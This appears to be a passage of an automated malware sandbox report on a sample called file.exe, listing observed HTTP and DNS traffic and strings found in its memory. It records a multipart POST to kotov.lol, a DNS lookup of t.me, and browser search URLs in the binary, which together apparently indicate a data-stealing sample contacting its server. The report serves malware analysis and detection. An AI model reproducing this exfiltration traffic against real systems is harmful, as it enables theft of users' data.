          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: kotov.lol
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kotov.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
          Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
          Source: chromecache_72.4.drString found in binary or memory: http://www.broofa.com
          Source: JEHJKJ.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chromecache_72.4.drString found in binary or memory: https://apis.google.com
          Source: file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
          Source: file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: JEHJKJ.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: JEHJKJ.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: JEHJKJ.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
          Source: file.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: JEHJKJ.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: JEHJKJ.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: JEHJKJ.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chromecache_72.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
          Source: chromecache_72.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
          Source: chromecache_72.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
          Source: chromecache_72.4.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
          Source: JEHIJD.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000002.2492376383.000000000047B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/
          Source: file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/.
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/1D
          Source: file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/2
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/4
          Source: file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/?ii
          Source: file.exe, 00000000.00000003.1784272680.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1809760612.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/Ai/
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/KJJJKFIIIJJJ
          Source: file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/L
          Source: file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kotov.lol/Z
